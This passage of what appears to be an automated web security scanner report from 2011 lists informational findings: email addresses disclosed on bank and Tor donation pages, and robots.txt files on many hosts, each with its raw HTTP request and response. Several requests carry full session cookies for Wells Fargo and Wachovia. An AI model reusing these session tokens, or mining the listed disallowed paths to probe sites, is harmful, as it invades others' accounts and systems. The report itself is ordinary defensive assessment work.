HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31556926;includeSubDomains
X-Content-Security-Policy: allow 'self' *.torservers.net
Content-type: text/html
Date: Tue, 19 Jul 2011 01:59:32 GMT
Server: lighttpd
Content-Length: 24791

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<input type="hidden" value="donate@torservers.net" name="pay_to_email"/>
...[SNIP]...
<input type="hidden" value="mailto:donate@torservers.net" name="status_url"/>
...[SNIP]...
<input type="hidden" value="donate@torservers.net" name="pay_to_email"/>
...[SNIP]...
<input type="hidden" value="mailto:donate@torservers.net" name="status_url"/>
...[SNIP]...
<input type="hidden" name="business" value="donate@torservers.net"/>
...[SNIP]...
<input name='business' type='hidden' value='donate@torservers.net' />
...[SNIP]...

18.14. https://www.wachovia.com/common_files/metrics/vignette/stats.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /common_files/metrics/vignette/stats.js

Issue detail

The following email address was disclosed in the response:

Request

GET /common_files/metrics/vignette/stats.js HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
Referer: https://www.wachovia.com/enroll
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=920DCE66B1EC10B13488C08483F0D444; JSESSIONID=0000nkyzwrL8tsfz1ZrPhM0ci7Q:13jgrcho1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:50:46 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 30 Mar 2011 01:00:15 GMT
Accept-Ranges: bytes
Cache-Control: max-age=-8412631
Expires: Wed, 13 Apr 2011 01:00:15 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Content-Length: 44963
Keep-Alive: timeout=10, max=25
Connection: Keep-Alive
Content-Type: application/x-javascript

/* Omniture SiteCatalyst Code */
var sc_code_ver="v 5.5"

/* REPORT SUITE ID SET PRIOR TO OMNI CODE CALL */
if(!s_account) var s_account="wachoviaglobal"
var s=s_gi(s_account)

/************* D
...[SNIP]...
#K=#W($L,(vt$4t`cvt)"
+"`Ys.hav()+q+(qs?qs:s.rq(^7)),0,id,ta);qs`h;`Rm('t')`5s.p_r)s.p_r(`I`d`h}^J(qs);^T`v($E;`k$E`e^3,`H$X1',vb`I@Q=^H=s.`Q`s=s.`Q^4=`G`o`h`5s.pg)`G^z@Q=`G^zeo=`G^z`Q`s=`G^z`Q^4`h`5!id@8s.tc@3tc=1;s.flus"
+"h`V()}`3#K`Ctl`0o,t,n,vo`2;s.@Q=$Po`I`Q^4=t;s.`Q`s=n;s.t($E}`5pg){`G^zco`0o){`N^t\"_\",1,$I`3$Po)`Cwd^zgs`0u$6`N^tun,1,$I`3s.t()`Cwd^zdc`0u$6`N^tun,$I`3s.t()}}@El=(`G`M`m`9`4'@Ss@20`I
...[SNIP]...

18.15. https://www.wellsfargo.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/

Issue detail

The following email address was disclosed in the response:

Request

GET /help/ HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; JSESSIONID=4EF7C30A5EF0B45DD6E1DC6B95DC840E; BRAND_COOKIE=COB; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 10:06:07 GMT
Content-type: text/html; charset=UTF-8
Content-Length: 13796


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Customer Service f
...[SNIP]...
<br/>reportphish@wellsfargo.com</li>
...[SNIP]...

18.16. https://www.wellsfargo.com/privacy_security/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy_security/ HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:58:56 GMT
Content-length: 7745
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy & Security
...[SNIP]...
<br/>reportphish@wellsfargo.com
<br/>
...[SNIP]...

18.17. https://www.wellsfargo.com/privacy_security/fraud/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy_security/fraud/ HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:58:51 GMT
Content-length: 7695
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Privacy an
...[SNIP]...
<br/>reportphish@wellsfargo.com<br/>
...[SNIP]...

18.18. https://www.wellsfargo.com/privacy_security/fraud/report/fraud  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/report/fraud

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy_security/fraud/report/fraud HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:58:57 GMT
Content-length: 5885
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy and Securi
...[SNIP]...
<strong>reportphish@wellsfargo.com</strong>
...[SNIP]...

18.19. https://www.wellsfargoadvisors.com/js/contactUsFA.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /js/contactUsFA.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/contactUsFA.js HTTP/1.1
Host: www.wellsfargoadvisors.com
Connection: keep-alive
Referer: https://www.wellsfargoadvisors.com/market-economy/economic-market-reports/stock-markets.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gridTracking=A2%20-%20The%20Week; s_sq=wsinternetglobal%2Cwspublic%3D%2526pid%253Dhttps%25253A%25252F%25252Fwww.wellsfargoadvisors.com%25252F%2526oid%253Dhttps%25253A%25252F%25252Fwww.wellsfargoadvisors.com%25252Fmarket-economy%25252Feconomic-market-reports%25252Fstock-markets.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:53:47 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 14 Jan 2011 22:47:46 GMT
ETag: "8c3-8e5-390c4880"
Accept-Ranges: bytes
Content-Length: 2277
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

var irtBuf = '';
var faBuf = '';
if(typeof(pfWin)=='undefined') {
var pfWin = false;
}

function buildIRT() {
irtBuf = '<div class="rightcolBox">';
irtBuf += '<h3>Contact Us</h3>';
...[SNIP]...
<a href="mailto:onlinefeedback@wellsfargoadvisors.com">
...[SNIP]...

19. Robots.txt file  previous  next
There are 41 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


19.1. http://a1.bing4.com/imagenewsfetcher.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.bing4.com
Path:   /imagenewsfetcher.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a1.bing4.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Sat, 01 May 2010 21:49:12 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Cache-Control: public, max-age=15552000
Date: Tue, 19 Jul 2011 12:11:03 GMT
Connection: close

User-agent: *
Disallow: /

19.2. http://a2.bing4.com/imagenewsfetcher.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a2.bing4.com
Path:   /imagenewsfetcher.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a2.bing4.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 01 May 2010 21:49:12 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 26
Cache-Control: public, max-age=14211549
Date: Tue, 19 Jul 2011 12:11:03 GMT
Connection: close

User-agent: *
Disallow: /

19.3. http://a4.bing4.com/imagenewsfetcher.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a4.bing4.com
Path:   /imagenewsfetcher.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a4.bing4.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 01 May 2010 21:49:12 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 26
Cache-Control: public, max-age=14918931
Date: Tue, 19 Jul 2011 12:11:04 GMT
Connection: close

User-agent: *
Disallow: /

19.4. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.ver.adhd_search/slideshow/womensymptoms

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Tue, 19 Jul 2011 01:58:24 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

19.5. https://adfarm.mediaplex.com/ad/bk/994-1668-2054-5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adfarm.mediaplex.com
Path:   /ad/bk/994-1668-2054-5

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1289502470000"
Last-Modified: Thu, 11 Nov 2010 19:07:50 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 19 Jul 2011 10:03:27 GMT
Connection: keep-alive

User-agent: *
Disallow: /

19.6. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:01:12 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Tue, 12 Jul 2011 21:05:19 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Wed, 20 Jul 2011 02:01:12 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

19.7. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 20 Jul 2011 01:58:26 GMT
Date: Tue, 19 Jul 2011 01:58:26 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

19.8. https://blog.torproject.org/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://blog.torproject.org
Path:   /images/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.torproject.org

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 10 Dec 2008 20:24:38 GMT
ETag: "54a03f3-637-c8fed80"
Accept-Ranges: bytes
Content-Length: 1591
Cache-Control: max-age=1209600
Expires: Tue, 02 Aug 2011 02:00:48 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.7.2.3 2008/12/10 20:24:38 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

19.9. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn-cms.scout.com
Path:   /feeds/analyticsfeed.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn-cms.scout.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Location: http://cdn-cms.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
ETag: "0abd1598770cb1:d3f"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:04:56 GMT
Content-Length: 135
Connection: close
Akamai: True

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

19.10. http://cdn-forums.scout.com/adfeed.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn-forums.scout.com
Path:   /adfeed.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn-forums.scout.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Location: http://cdn-forums.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 00:08:38 GMT
Server: Microsoft-IIS/6.0
Server: MBRD-Static1
X-Powered-By: ASP.NET
Akamai: True
Date: Tue, 19 Jul 2011 12:04:56 GMT
Content-Length: 81
Connection: close
Akamai: True

...User-agent: *
Disallow:
Sitemap: http://mbd.scout.com/forumsitemapindex.aspx

19.11. http://feeds.bbci.co.uk/news/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Server: Apache
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=1590
Expires: Tue, 19 Jul 2011 03:31:22 GMT
Date: Tue, 19 Jul 2011 03:04:52 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

19.12. http://fonts.googleapis.com/css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fonts.googleapis.com
Path:   /css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 19 Jul 2011 01:59:47 GMT
Expires: Tue, 19 Jul 2011 01:59:47 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

19.13. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1031455071/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1031455071/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 19 Jul 2011 01:59:57 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

19.14. http://l.addthiscdn.com/live/t00/250lo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 19 Jul 2011 01:59:35 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


19.15. http://minerva.healthcentral.com/b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://minerva.healthcentral.com
Path:   /b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: minerva.healthcentral.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "23d16a-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www401
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

19.16. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: networkpresence.com.au

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:55 GMT
Server: Apache
Last-Modified: Fri, 28 May 2010 07:21:31 GMT
ETag: "1369cc-130-5b2d74c0"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

19.17. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=80459853
Expires: Tue, 04 Feb 2014 09:02:24 GMT
Date: Tue, 19 Jul 2011 03:04:51 GMT
Connection: close

User-agent: *
Disallow: /

19.18. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: odb.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"28-1306768642000"
Last-Modified: Mon, 30 May 2011 15:17:22 GMT
Content-Type: text/plain
Content-Length: 28
Date: Tue, 19 Jul 2011 01:58:21 GMT
Connection: close

User-agent: *
Disallow: /



19.19. https://online.wellsfargo.com/signon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: online.wellsfargo.com

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:46:48 GMT
Content-length: 26
Content-type: text/plain
Last-modified: Fri, 29 May 2009 01:57:27 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /

19.20. http://paid.outbrain.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://paid.outbrain.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: paid.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"28-1306768642000"
Last-Modified: Mon, 30 May 2011 15:17:22 GMT
Content-Type: text/plain
Content-Length: 28
Date: Tue, 19 Jul 2011 01:58:19 GMT
Connection: close

User-agent: *
Disallow: /



19.21. https://secure.codero.com/order/v/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.codero.com
Path:   /order/v/shop

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.codero.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:51 GMT
Server: Apache/2.2
Vary: Host,Accept-Encoding
Last-Modified: Mon, 12 Jun 2006 18:43:46 GMT
ETag: "36066a-19-548fbc80"
Accept-Ranges: bytes
Content-Length: 25
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

19.22. https://secure2.internode.on.net/nodestore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /nodestore

Issue detail

The web server contains a robots.txt file.

Request

